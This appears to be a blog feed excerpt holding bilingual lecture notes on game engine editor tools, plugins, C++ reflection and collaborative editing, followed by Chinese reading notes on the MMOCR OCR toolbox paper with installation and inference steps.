    API: A series of functions exposed by the engine, plug-ins can use functions to execute the logic what we want.

    API:引擎暴露出来的一系列函数,插件可以使用这些函数来执行我们想要的逻辑。

    Plug-in-Add a Toolbar Button

    ​插件-添加工具栏按钮

    webp

    Plug-in -Add a Plug-in Menu in Unreal5

    webp

    Plug-in-Summary

    ​插件概述

    webp

    The meaning of plug-in framework

    ​插件框架的意义

    • Extend editor functionality

      扩展编辑器功能

    • Ease to hot update as decoupling

      解耦,方便热更新

    • Facilitate the construction of engine development ecology

      方便引擎开发生态的构建

    Plug-in framework requirements

    ​插件框架要求

    • Full API support

      完整的 API 支持

    • Common interface support

      通用接口支持

    References

    ​参考文献

    第十四节:引擎工具链高级概念与应用

    Glance of Game Production

    ​游戏制作概览

    whether to work on the environment, the animation, to place characters or to create missions.

    ​是在环境,动画中工作,放置角色还是创建任务

    Adapt to Different Game Genres

    ​适应不同的游戏类型

    webp

    Challenges from Real Production

    ​真实游戏开发中的挑战。

    webp

    ​在游戏开发中:

    • Massive various data from DCC and engine tools

      大量来自 DCC 和发动机工具的各种数据

    • Artist, designer and programmer with different mindsets

      艺术家,设计师和具有不同心态的程序员

    • WYSIWYG is must for highquality production

      所见即所得,必须高质量生产

    World Editor-A hub for everything to build the world

    ​世界编辑 - A Hub供所有建立世界的枢纽

    webp

    ​Unreal 为游戏开发者提供的界面。

    Editor Viewport: A Special Version of Game Engine

    ​编辑器视口:游戏引擎的特殊版本

    • Main window of interaction between designers and game world

      设计师与游戏世界之间的互动主窗口(便于设计师 Debug 用的互动窗口)

    • Powered by a full game engine in special "editor” mode

      由特殊“编辑”模式的完整游戏引擎提供动力

    • Provides a variety of special gadgets and visualizers for editing

      提供各种用于编辑的特殊小工具和可视化器

    WARNING: Editor-only code must be moved out of released game!

    ​警告:仅编辑代码必须从发布的游戏中移出!

    Everything is an Editable Object

    ​一切都是一个可编辑的对象

    webp

    • The editing requirements of all objects in the editor world are mostly the same, such as moving, adjusting parameters, etc

      编辑世界中所有对象的编辑要求大多是相同的,例如移动,调整参数等

    Different Views of Objects

    ​对象的不同视图

    • Display all of the objects within the scene

      显示场景中的所有对象

    • Organize objects in different views for user conveniences

      在不同视图中组织对象的用户便利

    webp

    Tree view

    webp

    Categories and groups

    Schema-Driven Object Property Editing

    ​模式驱动的对象属性编辑

    webp

    • Displays all of the editable properties for the selected objects

      显示所选对象的所有可编辑属性

    • Beyond schema, we can define some customized editing utilities for different types

      除了模式之外,我们还可以为不同类型的对象定义一些自定义的编辑实用程序

    Content Browser

    ​内容浏览器

    webp

    • Provide intuitive thumbnail of all assets

      提供所有资产的直观缩略图

    • Share asset among different projects

      在不同项目之间共享资产

    • Evolution of asset management from static file folder to content “ocean”

      资产管理从静态文件夹演变为内容“海洋”

    Editing Utilities in World Editor

    ​世界编辑器中的编辑实用程序

    webp

    ​便于用户编辑游戏对象的图示。

    Mouse Picking

    ​鼠标拾取

    Ray Casting

    射线投射

    webp

    Pros:

    • No cache required

      无需缓存

    • Can support multiple objects on selected rays

      可以支持选定射线上的多个对象

    Cons:

    • Poor query performance

      查询性能较差

    RTT

    webp

    Pros:

    • Easy to implement range queries

      易于实现范围查询

    • Ability to complete queries quickly

      能够快速完成查询

    Cons:

    • Need to draw an extra picture

      需要绘制额外的图片

    • Obstructed objects cannot be selected

      无法选择被遮挡的物体

    Object Transform Editing

    webp

    ​游戏引擎要便于用户对 Object 作 Transform Editing。

    Terrain

    webp

    Landform

    ​地形

    • Height map

      高度图

    Appearance

    ​外观

    • Texture map

      纹理图

    Vegetation

    ​植被

    • Tree instances

      树木实例

    • Decorator distribution map

      装饰器分布图

    Height Brush

    ​高度画笔

    webp

    • Draw height map to adjust terrain mesh

      绘制高度图以调整地形网格

      • Height change needs to be natural and smooth

        高度变化需要自然流畅

      • Can be easily adjusted to the desired results

        可以轻松调整到所需效果

        • Customized brush

          自定义画笔

    Instance Brush

    webp

    ​实例画笔(给地标种树)

    Pros:

    • Instance position is fixed

      实例位置固定

    • Available to further modification

      可进一步修改

    Cons:

    • Large amount of data

      数据量大

    Environment

    ​环境

    webp

    • Sky

      天空

    • Light

      灯光

    • Roads

    • Rivers

      河流

    From up to down, environment around us present a live world to the player. Edit these environment elements would also be important.

    ​从上到下,我们周围的环境为玩家呈现了一个生动的世界。编辑这些环境元素也很重要。

    Environment - Rule System

    webp

    ​有了这些规则更好地让用户创建合理的地形环境。

    Rules:

    ​规则:

    • Tree will not grow beside objects.

      树不会在物体旁边生长。

    • Tree will not grow in water.

      树不会在水中生长。

    • Tree will not grow on roads.

      树不会在道路上生长。

    Conclusion:

    ​结论:

    • Rule system handling data changes.

      规则系统处理数据变化。

    • Decoupled Environment systems.

      解耦环境系统。

    Editor Plugin Architecture

    ​编辑器插件架构

    Examples of Plug-in Module in Commercial Softwares

    ​商业软件中的插件模块示例

    webp

    A Cross Matrix between Systems and Objects

    ​系统与对象之间的交叉矩阵

    webp

    Any system and object type could be plug-ins to Editors

    ​任何系统和对象类型都可以成为编辑器的插件

    Combination of Multiple Plugins

    ​多种插件架构

    webp

    Covered

    ​覆盖

    • Only execute the newly registered logic, skip the original logic

      仅执行新注册的逻辑,跳过原始逻辑

    • Ex. Terrain editing overwrite

      例如地形编辑覆盖

    webp

    Distributed

    ​分布式

    • Each plugin will be executed, and if there is an output, the results will eventually be merged

      每个插件都会被执行,如果有输出,结果最终会被合并

    • Ex. Most special system editing seperately

      例如大多数特殊系统都是单独编辑的

    webp

    Pipeline

    ​管道

    • Input and output are connected to each other, generally input and output are the same data type

      输入和输出相互连接,通常输入和输出是相同的数据类型

    • Ex.Asset preprocessing, geometry for physics

      例如资产预处理、物理几何

    webp

    Onion rings

    ​洋葱圈

    • On the basis of the pipeline, the core logic of the system is in the middle, and the plug-in pays attention to the logic of entering and exiting at the same time

      在管线的基础上,系统的核心逻辑在中间,插件同时关注进入和退出的逻辑

    • Ex. Road editing plugin with terrain plugin

      Ex. 道路编辑插件与地形插件

    One More Thing-Version Control

    ​还有一件事-版本控制

    A certain version relationship is required between the plug-in and the host application to ensure that they can work together normally.

    ​插件和宿主应用之间需要有一定的版本关系,才能保证它们能够正常协同工作。

    • Plug-in use the same version number with the host application

      插件使用与宿主应用相同的版本号

    • Plug-in use the version number of the plug-in interface

      插件使用插件接口的版本号

      • This is more recommended because the update frequency of the plug-in interface and thesoftware may be different

        这是比较推荐的做法,因为插件接口和软件的更新频率可能不一样

    Design Narrative Tools

    ​设计叙述工具

    Storytelling in Game Engine

    ​游戏引擎中的故事叙述

    Control many parameters variance in the timeline

    ​控制时间轴中的许多参数变化

    webp

    Sequencer

    ​序列发生器(做动画的软件里常有)

    webp

    • Track: ln order to reference actors in your sequence. Any character, prop, camera, effect, or othelactors can be referenced and manipulated in Sequencer

      轨道:为了引用序列中的演员。任何角色、道具、摄像机、效果或其他演员都可以在 Sequencer 中引用和操纵

    • Property Track: Property of reference actors in track

      属性轨道:轨道中引用演员的属性

    • Timeline: A line describing time in discrete frames

      时间轴:描述离散帧中时间的线

    • Key Frame: The key fames can manipulate properties. Upon reaching a key frame in the timeline the track’s properties are updated to reflect the values you have defined at that point

      关键帧:关键帧可以操纵属性。到达时间轴中的关键帧后,轨道的属性将更新以反映您在该点定义的值

    • Sequence: Sequencer’s data

      序列:Sequencer 的数据

    Sequencer-Bind Objects to Track

    ​序列器-将对象绑定到跟踪

    webp

    How to let the sequencer control my “chick”

    ​如何让音序器控制我的“小鸡”

    • Bind the “chick” to Track

      将“小鸡”绑定到轨道

    Sequencer-Bind Object Property to Property Track

    ​Sequencer-将对象属性绑定到属性轨道

    How to control the moving position of the “chick”

    ​如何控制“小鸡”的移动位置

    • Bind position property toproperty track

      将位置属性绑定到属性轨道

    Sequencer-Set Key Frame

    ​Sequencer-设置关键帧

    How to make an “chick” reach a specified position

    ​如何让“小鸡”到达指定位置

    Sequencer-Set Key Frames

    ​序列器设置关键帧

    A, B, C, D are key frames.

    ​A、B、C、D 是关键帧。

    How “chick” go from A to B to C to D

    ​“小鸡”如何从 A 到 B 再到 C 再到 D

    webp

    Sequencer-Interpolate Properties along Key Frames

    ​Sequencer-沿关键帧插入属性

    Similar to animation, set key frames

    ​与动画类似,设置关键帧

    webp

    Reflection and GamePlay

    Reflection is Foundation of Sequencer

    ​反射是 Sequencer 的基础

    webp

    Any data in game engine can be bind into track based on reflection system

    ​游戏引擎中的任何数据都可以根据反射系统绑定到轨道中

    Complexity of Game Play

    Visual Scripting System

    webp

    ​可视化编程系统,如蓝图。

    Hard Code Method for More Feature

    ​硬编码方法实现更多功能,但是代码也更复杂。

    1
    2
    3
    4
    5
    6
    7
    8
    class Human: public object{
    void Jump() {
    // do something ...
    }
    void StopJump() {
    // do something ...
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    void CallFunction(object* instance, string type_name, string func_name)
    {
    if (type_name == "Human") {
    Human* human = (Human*)instance;
    if (func_name == "Jump") {
    human->Jump();
    }
    else if(func_name == "StopJump"){
    human->StopJump();
    }
    }
    }

    A Common Solution - Reflection

    ​常见解决方案 - 反射

    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.

    ​在计算机科学中,反射编程或反射是指进程检查、自省和修改自身结构和行为的能力。

    ​现在高级的语言编程都有反射的设计。

    JAVA Reflection

    1
    2
    3
    4
    5
    6
    7
    8
    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    package Demo;
    import java.lang.refelect.Field;
    import java.lang.refelect.Method;
    public class Demo {
    public static void main(String[] args) throws Exception {
    Class<?> cls = Class.forName("Demo.test");
    Object obj = cls.getConstructor().newInstance();
    Field filed_accessor = cls.getField("m_filed");
    filed_accessor.set(obj, 2);

    Method method_accessor = cls.getMethod("print");
    method_accessor.invoke(obj);
    }
    }

    Reflection Build the Bridge between Code and Tools

    ​反射在代码和工具之间搭建桥梁

    Using reflection to generate a code meta information map

    ​使用反射生成代码元信息图

    • class_name, func_name and para_name

    • generate accessor and invoker

      生成访问器和调用器

    1
    2
    3
    4
    5
    6
    7
    8
    9
    class Human: public Object {
    void Jump() {
    // do something ...
    }

    void StopJump() {
    // do something ...
    }
    }
    1
    2
    3
    4
    5
    void callFunction(object* instance, string type_name, string func_name)
    {
    FunctionPtr function_ptr = FunctionInfoMap::getInvokefunction(instance, type_name, func_name);
    function ptr->invoke();
    }

    How to Implement Reflection in C++

    ​如何在 C++ 中实现反射

    • Collect type info from code

      从代码中收集类型信息

    • Generate code to provide accessors for fields and methods

      生成代码以提供字段和方法的访问器

    • Manage all accessors with a <string,accessor> map

      使用 <string,accessor> 映射管理所有访问器

    How to Get Type Info from Code

    ​如何从代码中获取类型信息

    General Programming Language (GPL) Compilation Process

    ​通用编程语言 (GPL) 编译过程

    webp

    Abstract Syntax Tree (AST): An abstract representation of the syntax structure of source code. It represents the syntax structure of programming language in the form of a tree, and each node in the tree represents a construct in the source code.

    抽象语法树(AST):源代码语法结构的抽象表示。它以树的形式表示编程语言的语法结构,树中的每个节点代表源代码中的一个构造。

    webp

    Why Piccolo Use Clang

    webp

    One of Clang’s main goals is to provide a library-based architecture, so that the compiler could interoperate with other tools that interact with source code.

    ​Clang 的主要目标之一是提供基于库的架构,以便编译器可以与其他与源代码交互的工具进行互操作。

    Generate Schema From AST

    ​从 AST 生成模式

    webp

    • Parsing AST, such as type name, field name, field type, etc

      解析 AST,例如类型名称、字段名称、字段类型等

    • Build a temporary schema of data in memory

      在内存中构建数据的临时模式

    Precise Control of Reflection Scope

    ​精确控制反射作用域

    webp

    In the actual scenario, we need to add a lot of tag information to identify the purpose of the type.

    ​实际场景中,我们需要添加很多标签信息来标识类型的用途。

    Use Marco to Add Reflection Controls

    ​使用 Marco 添加反射控件

    webp

    Add tags by __attribute__

    ​通过 __attribute__ 添加标签

    • __attribute__ is a source code annotation provided by clang. In the code, the required data types can becaptured by using these macros.

      __attribute__ 是 clang 提供的源代码注释,在代码中可以通过这些宏来捕获需要的数据类型。

    • Define a “CLASS” macro to distinguish between precompile and compile.

      定义一个 “CLASS” 宏来区分预编译和编译。

      • When precompiling, define “__REFOECTION_PARSER__” macro in meta parser to make_the attribute information effective

        预编译时,在 meta parser 中定义“__REFOECTION_PARSER__”宏,使属性信息生效

    Reflection Accessors

    ​反射访问器

    webp

    Generate reflection accessors using schemas

    ​使用模式生成反射访问器

    • For classes, we need to generate type info getters

      对于类,我们需要生成类型信息获取器

    • For fields, we need to generate setters and getters that can access them

      对于字段,我们需要生成可以访问它们的设置器和获取器

    • For functions, we need to generate invoker that can invoke tem

      对于函数,我们需要生成可以调用 tem 的调用器

    Code Rendering

    ​代码渲染

    The same type of business code structure is the same.

    ​同类型的业务代码结构都是一样的。

    webp

    Code Rendering

    ​代码渲染

    Code Rendering is the process of collecting data (if any) and loading related templates (or sending output directly). The collected data is then applied to the associated template. The final output is sent to the user.

    ​代码渲染是收集数据(如果有)并加载相关模板(或直接发送输出)的过程。然后将收集的数据应用于相关模板。最终输出将发送给用户。

    Pros:

    ​优点

    • Strong separation of code and data

      代码和数据完全分离

    Code Rendering-Mustache

    ​代码渲染-Mustache

    webp

    Mustache is a web template system.

    ​Mustache 是一个 Web 模板系统。

    It is named “Mustache” because of heavy use of braces, {{}}, that resemble a sideways moustache.

    ​它被命名为“Mustache”,因为它大量使用了括号 {{}},类似于侧胡子。

    Use Mustache to Code Generation

    ​使用 Mustache 进行代码生成

    webp

    • Implementing business logic using mustache templates

      使用 Mustache 模板实现业务逻辑

    • Generate code through mustache rendering

      通过 Mustache 渲染生成代码

    Collaborative Editing

    ​协作编辑

    ​一个游戏开发项目可能需要多个人来协作编辑。

    Bottlenecks in Large Projects

    ​大型项目的瓶颈

    webp

    • Lots of people work with lots of assets

      许多人使用大量资产

    • Assets version management is very difficult

      资产版本管理非常困难

    Merging Conflicts is The Biggest Problem

    ​合并冲突是最大的问题

    webp

    • Everyone needs to spend a lot of time on merging conflicts when updating or uploading assets

      每个人在更新或上传资产时都需要花费大量时间解决合并冲突

    How to Reduce Conflicts

    ​如何减少冲突

    • Split assets into smaller parts to reduce the probability of conflicts

      将资产拆分成更小的部分以减少冲突的可能性

      • Layering the world

        分层世界

      • Divide the world

        划分世界

      • One file per actor (OFPA)

        每个演员一个文件 (OFPA)

    • All people work in the same scene to completely eliminate the conflict

      所有人都在同一个场景中工作以完全消除冲突

    Split Assets-Layering the World

    ​拆分资产 - 分层世界

    webp

    • Split the world into many layers, each of which is stored in an asset file

      将世界拆分成多个层,每个层都存储在资产文件中

    • Different people work at different levels

      不同的人在不同的层面上工作

    Pros

    • Appropriate layers would decrease edit confliction

      适当的层会减少编辑冲突

    • Layer-based logic available

      提供基于层的逻辑

    Cons

    • Layer logic may dependents on another layer

      层逻辑可能依赖于另一层

    • Difficult to reasonably split layers when the world is very complex

      当世界非常复杂时,很难合理地拆分层

    Split Assets- Divide the World

    ​分割资产 - 划分世界

    webp

    • The world is divided into fixed size blocks, and each block is saved in an asset file

      世界被划分为固定大小的区块,每个区块都保存在资产文件中

    • Different people work at different blocks

      不同的人在不同的区块工作

    Pros

    • Location based splitting makes it easy to dynamically expand the world

      基于位置的分割使动态扩展世界变得容易

    • Space separating is more intuitive to operator

      空间分离对操作员来说更直观

    Cons

    • Difficult to deal with objects across multiple blocks

      难以处理跨多个块的对象

    One File Per Actor

    ​每个 Actor 一个文件

    webp

    A splitting method proposed by unreal5

    ​unreal5 提出的一种拆分方法

    • reduces overlap between users by saving data for instances of Actors in external files, removing the need to save the main Level file when making changes to its Actors

      通过将 Actor 实例的数据保存在外部文件中来减少用户之间的重叠,无需在更改 Actor 时保存主关卡文件

    • All Actors are embedded in their respective Level files when cooked

      烘焙后,所有 Actor 都嵌入到各自的关卡文件中

    A Special Way to Split Assets-OFPA

    ​资产分割的特殊方法-OFPA

    webp

    Pros

    • Fine-grained scene division, fewer edit confliction

      场景划分细粒度,编辑冲突更少

    • Only need to save objects modified

      只需保存修改的对象

    Cons

    • Massive files to manage, more burden for version control

      需要管理大量文件,版本控制负担更重

    • Cook will be slow down while embedding many OFPA files to level file

      将许多 OFPA 文件嵌入关卡文件时,Cook 速度会变慢

    Coordinate Editing in One Scene

    ​在一个场景中协调编辑

    webp

    Connect multiple instances of world editor together to work collaboratively in a shared editing session, building a single virtual world together with your teammates and colleagues in real time.

    ​将多个世界编辑器实例连接在一起,在共享编辑会话中协同工作,实时与您的队友和同事一起构建一个虚拟世界。

    How to Synchronize My Operations with Others

    ​如何将我的操作与他人同步

    webp

    Do you remember command system?

    ​你还记得命令系统吗?

    • Serialize my commands and send them to server

      序列化我的命令并将其发送到服务器

    • Receive commands from server and deserialize them

      从服务器接收命令并反序列化它们

    • Invoke commands

      调用命令

    There is A Very Big Challenge

    ​有一个非常大的挑战

    How to ensure the consistency of distributed operations?

    ​如何保证分布式操作的一致性?

    webp

    Undo/Redo

    webp

    Operation Merge

    Two Users Cannot Edit The Same instance at The Same Time

    ​两个用户不能同时编辑同一个实例

    Instance lock: Avoid multiple people modifying the same instance at the same time

    实例锁:避免多人同时修改同一个实例

    webp

    Two Users Cannot Edit The Same Asset at The Same Time

    ​两个用户不能同时编辑同一资产

    webp

    Asset lock: Avoid multiple people modifying the same asset at the same time

    资产锁定:避免多人同时修改同一资产

    But Lock is not Omnipotent

    webp

    If there are three users working in the same world, and now User2 presses the undo button, what do we expect to happen? lf he presses the redo button next?

    ​如果有三个用户在同一个世界中工作,现在用户 2 按下了撤消按钮,我们期望发生什么?如果他接下来按下重做按钮?

    How to Solve These Problems Thoroughly

    ​如何彻底解决这些问题

    Operation Transform (OT): Abstract the operation into an operation sequence consisting of an enumerable N atomic operation types

    操作转换 (OT):将操作抽象为由可枚举的 N 个原子操作类型组成的操作序列

    Conflict-free Replicated Data Type(CRDT): A data structure that is replicated across multiple computers in a network, with the following features:

    无冲突复制数据类型 (CRDT):在网络中的多台计算机上复制的数据结构,具有以下特点:

    • The application can update any replica independently, concurrently and without coordinating with otherreplicas

      应用程序可以独立、并发地更新任何副本,而无需与其他副本协调

    • An algorithm (itself part of the data type) automatically resolves any inconsistencies that might occur

      算法(本身是数据类型的一部分)会自动解决可能发生的任何不一致问题

    • Although replicas may have different state at any particular point in time, they are guaranteed to eventually converge

      虽然副本在任何特定时间点可能具有不同的状态,但它们最终会收敛

    Traditional Workflow vs. Collaborative Editing Workflow

    ​传统工作流程与协作编辑工作流程

    webp

    Traditional Workflow

    webp

    Collaborative Editing Workflow

    Server is the Most Important Role

    ​服务器是最重要的角色

    webp

    Client

    ​客户端

    • Crash

      崩溃

    • Maloperation

      操作不当

    Server

    ​服务器

    • Crash

      崩溃

    • The server retains each session untithe user who createdthe session
      expressly deletes it, or until the server itself is shut down.

      服务器保留每个会话,直到创建会话的用户明确删除它,或直到服务器本身关闭。

    • Save session records to disk

      将会话记录保存到磁盘

    References

    ]]>
    @@ -1782,7 +1782,7 @@ /posts/Paper-MMOCR-A%20Comprehensive%20Toolbox%20for%20Text%20Detection,%20Recognition%20and%20Understanding/ - 配置

    资源

    正文

    Abstract

    ​我们提出了 MMOCR——一个开源工具箱,它提供了一个全面的管道文本检测和识别,以及其下游任务,如命名实体识别和关键信息提取。MMOCR 实现了 14 种最先进的算法,这比我们迄今为止所知道的所有现有开源 OCR 项目都要多得多。为了促进文本识别相关问题的未来研究和工业应用,我们还提供了大量的训练模型和详细的基准测试,以给予深入了解文本检测,识别和理解的性能。MMOCR 在 https://github.com/open-mmlab/mmocr 上公开发布。

    1 INTRODUCTION

    ​不同的方法利用不同的培训数据集,优化策略(例如,优化者,学习率时间表,时期数字,预训练的权重和数据增强管道)和网络设计(例如网络体系结构和损失)。为了涵盖各种模型中使用的组件多样性,我们提出了 MMOCR 工具箱,该工具箱涵盖了统一框架中最近流行的文本检测,识别和理解方法。截至目前,工具箱实现了七种文本检测方法,五个文本识别方法,一种关键信息方法和一种命名实体识别方法。整合各种算法赋予代码可重复使用性,因此大大简化了算法的实现。此外,统一框架允许公平地比较不同的方法,并且可以轻松研究其关键有效组件。据我们所知,MMOCR 在各种开源工具箱中重新实现了最深入的基于学习的文本检测和识别方法,我们认为这将促进未来的文本检测,识别和理解研究。

    ​MMOCR 在 Apache-2.0 许可证下在 https://github.com/open-mmlab/mmocr 上公开发布。该存储库包含所有源代码和详细文档,包括安装说明、数据集准备脚本、API 文档、模型动物园、教程和用户手册。MMOCR 重新实现了十多个最先进的文本检测、识别和理解算法,并提供了在流行的学术数据集上训练的广泛基准和模型。为了支持多语言 OCR 任务,MMOCR 还发布了在工业数据集上训练的中文文本识别模型。除了(分布式)培训和测试脚本,MMOCR 还提供了一套丰富的实用工具,涵盖了可视化、演示和部署。MMOCR 提供的模型很容易转换为 Onnx,它得到了部署框架和硬件设备的广泛支持。因此,它对学术研究人员和工业开发人员都很有用。

    • 文本检测。文本检测旨在将文本实例的边界框进行定位。最近的研究重点已转移到具有挑战性的 arbitrary-shaped text detection

      • Mask R-CNN 可用于检测文本,由于基于矩形的 ROI 建议,它可能无法检测弯曲和密集的文本。
      • 另一方面,TextSnake 用一系列有序的重叠圆盘来描述文本实例。
      • PSENet 提出了一种渐进式规模扩展网络,可以区分位置接近的弯曲文本实例。
      • DB 通过向分割网络提出可微分二值化函数来简化场景文本分割的二值化后处理,其中图像概率图的每个点处的阈值可以自适应地预测。
    • 文本识别。文本识别由于能够从文本图像中提取丰富的语义信息而受到越来越多的关注。

      • 卷积递归神经网络(CRNN)使用端到端的可训练神经网络,该网络由用于特征提取的深度卷积神经网络(DCNN),用于顺序预测的递归神经网络(RNN)和用于产生标签序列的转录层组成。
      • RobustScanner 能够通过使用新的位置增强分支和动态融合模块来识别无上下文文本,从而减轻随机文本图像的误识别问题。
      • 已努力将不规则文本输入纠正为与典型文本识别器兼容的规则文本。例如,薄板样条(TPS)变换在深度神经网络中使用,该深度神经网络结合了空间 Transformer 网络(STN)和序列识别网络(SRN),以在将弯曲和透视文本输入 SRN 之前纠正它们。
    • 关键信息提取。非结构化文档图像(如收据或信用票据)的关键信息提取(KIE)最主要用于办公自动化任务,包括高效存档和合规性检查。传统的方法,如模板匹配,不能很好地推广看不见的模板的文档。提出了几种模型来解决泛化问题。

      • 例如,CloudScan 使用 NER 来分析整个发票的连接一维文本序列。
      • Chargrid 将每个文档页面编码为一个二维字符网格进行语义分割,但由于它只覆盖了小邻域的二维空间布局信息,不能充分利用文本区域之间的非局部、远距离的空间关系。
      • 最近,已经开发了一种端到端的空间双模态图推理(SDMG-R)模型,该模型对文本识别错误特别鲁棒。它将非结构化文档图像建模为空间双模态图,图节点作为检测到的文本框,图边缘作为节点之间的空间关系。
    • 命名实体识别。命名实体识别(NER)旨在定位命名实体并将其分类为预定义的类别,例如个人或组织的名称。它们基于双向 LSTM 或条件随机场。

    webp

    • 开源 OCR 工具箱。多年来,已经开发了几种开源 OCR 工具箱,以满足学术界和行业的日益增长的需求。
      • Tesseract 是开源 OCR 工具箱的先驱。它于 2005 年公开发布,并提供了 CLI 工具来从图像中提取印刷字体文本。最初,它遵循了传统的分步管道,其中包括连接的组件分析,文本线查找,基线拟合,固定的音高检测和切碎,比例的单词查找和单词识别。现在,它支持基于 LSTM 的 OCR 引擎,并支持 100 多种语言。
      • 基于深度学习的开源 OCR Toolbox Easyocr 于最近发布。它为工业用户提供了简单的 API,并支持 80 多种语言。它实施了工艺检测器和 CRNN 识别器。但是,它仅用于推理,不支持模型培训。
      • Centernocr 是另一个流行的开源 OCR 工具箱。它分别使用 Yolo-V3 和 CRNN 进行文本检测和识别,并使用 OpenCV DNN 进行深层模型推断。
      • 相比之下,Chineseocr_lite 提供了轻巧的中文检测和识别工具箱,该工具箱使用 DB 检测文本和 CRNN 来识别文本。它提供了基于 NCNN 和 TNN 的远期推理,并且可以轻松地在 Windows,Linux 和 Android 等多个平台上部署。
      • Paddleocr 是基于 PaddlePaddle 的实用开源 OCR 工具箱,可以部署在 Linux,Windows 和 MacOS 等多个平台上。目前,它支持 80 多种语言并实施三种文本检测方法(EAST,DB 和 SAST),五种识别方法(CRNN,Rosetta,Star-Net,RAGE 和 SRN),以及一种端到端的文本发现方法(PGNET)。

    3 TEXT DETECTION STUDIES

    ​深度学习模型的性能受许多重要因素影响。在本节中,我们研究了网络架构的主干和颈部。我们在不同基于分割的文本检测方法之间交换上述组件,以衡量性能和计算复杂度的影响。

    webp

    Backbone。ResNet18 和 ResNet50 在文本检测方法中常被使用。为了实际应用,我们还介绍了一种适用于 GPU 的轻量级主干 ddrnet23-slim。表中比较了将 ResNet18、ResNet50 和 ddrnet23-slim 插入 PSENet、PAN 和 DB 中的 FLOPs 和 H-mean。结果显示,ddrnet23-slim 的表现略逊于 ResNet18 和 ResNet50,其 FLOPs 分别仅为 ResNet18 和 ResNet50 的 45% 和 21%。

    webp

    Neck。PSENet、PAN 和 DB 提出了不同的类似 FPN 的颈部结构来融合多尺度特征。我们在表中的实验结果显示,PSENet 中提出的 FPNF 可以在 PSENet 和 DB 中达到最佳的 H-mean。然而,它的 FLOPs 明显高于 DB 中提出的 PFNC 和 PAN 中提出的 FPEM_FFM。相比之下,FPEM_FFM 在 PAN 中拥有最低的 FLOPs,并且达到最佳的 H-mean。

    4 CONCLUSIONS

    ​我们已经公开发布了 MMOCR,这是一个涵盖文本检测、识别和理解的综合工具包。MMOCR 已经实现了 14 种最先进的算法,比所有现有的开源 OCR 项目都要多。此外,它提供了广泛的训练模型、基准测试、详细的文档和实用工具。在本报告中,我们广泛地将 MMOCR 与其他开源 OCR 项目进行了比较。此外,我们还引入了一种适用于 GPU 的轻量级主干 ddrnet23-slim,并对主干和颈部的影响进行了认真研究,以指导工业应用中的检测性能和计算复杂度。

    代码

    安装

    ​创建虚拟环境:

    conda create -n open-mmlab python=3.8
    conda activate open-mmlab

    ​离线安装 pytorch 和 torchvision:

    pip install torch-1.13.1+cu117-cp38-cp38-win_amd64.whl
    pip install torchvision-0.14.1+cu117-cp38-cp38-win_amd64.whl

    ​使用 MIM 安装 MMEngineMMCVMMDetection

    pip install -U openmim
    mim install mmengine
    mim install mmcv
    mim install mmdet

    ​从 open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 获取代码,进这个文件夹:

    pip install -v -e .
    # "-v" 会让安装过程产生更详细的输出
    # "-e" 会以可编辑的方式安装该代码库,你对该代码库所作的任何更改都会立即生效

    推理

    ​快速开始:

    from mmocr.apis import MMOCRInferencer
    ocr = MMOCRInferencer(det='DBNet', rec='CRNN')
    • 要用 MMOCR 的预训练模型进行推理,只需要把它的名字传给参数 det,权重将自动从 OpenMMLab 的模型库中下载和加载。此处记录了 MMOCR 中可以通过该方法初始化的所有模型。

      MMOCRInferencer(det='DBNet')
    • 要加载自定义的配置和权重,你可以把配置文件的路径传给 det,把权重的路径传给 det_weights

      MMOCRInferencer(det='path/to/dbnet_config.py', det_weights='path/to/dbnet.pth')
    • 默认情况下,MMEngine 会在训练模型时自动将配置文件转储到权重文件中。如果你有一个在 MMEngine 上训练的权重,你也可以将权重文件的路径传递给 weights,而不需要指定 model

      # 如果无法在权重中找到配置文件,则会引发错误
      inferencer = TextDetInferencer(weights='path/to/dbnet.pth')
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    Downloading: "https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    100%|███████████████████████████████████████████████████████████████████████████████| 107M/107M [00:17<00:00, 6.50MB/s]
    05/30 10:22:37 - mmengine - WARNING - Failed to search registry with scope "mmocr" in the "function" registry tree. As a workaround, the current "function" registry in "mmengine" is used to build instance. This may cause unexpected failure when running the built modules. Please check whether "mmocr" is a correct scope, or whether the registry is initialized.
    C:\Users\XXX\.conda\envs\openmmlab\lib\site-packages\mmengine\visualization\visualizer.py:196: UserWarning: Failed to add <class 'mmengine.visualization.vis_backend.LocalVisBackend'>, please provide the `save_dir` argument.
    warnings.warn(f'Failed to add {vis_backend.__class__}, '
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    Downloading: "https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    100%|█████████████████████████████████████████████████████████████████████████████| 91.8M/91.8M [00:13<00:00, 6.96MB/s]
    The model and loaded state dict do not match exactly

    unexpected key in source state_dict: data_preprocessor.mean, data_preprocessor.std
    ocr('demo/demo_text_ocr.jpg', show=True, print_result=True)

    webp

    ​看来它默认不支持中文和弯曲文本……

    webp

    ]]>
    + 配置

    资源

    正文

    Abstract

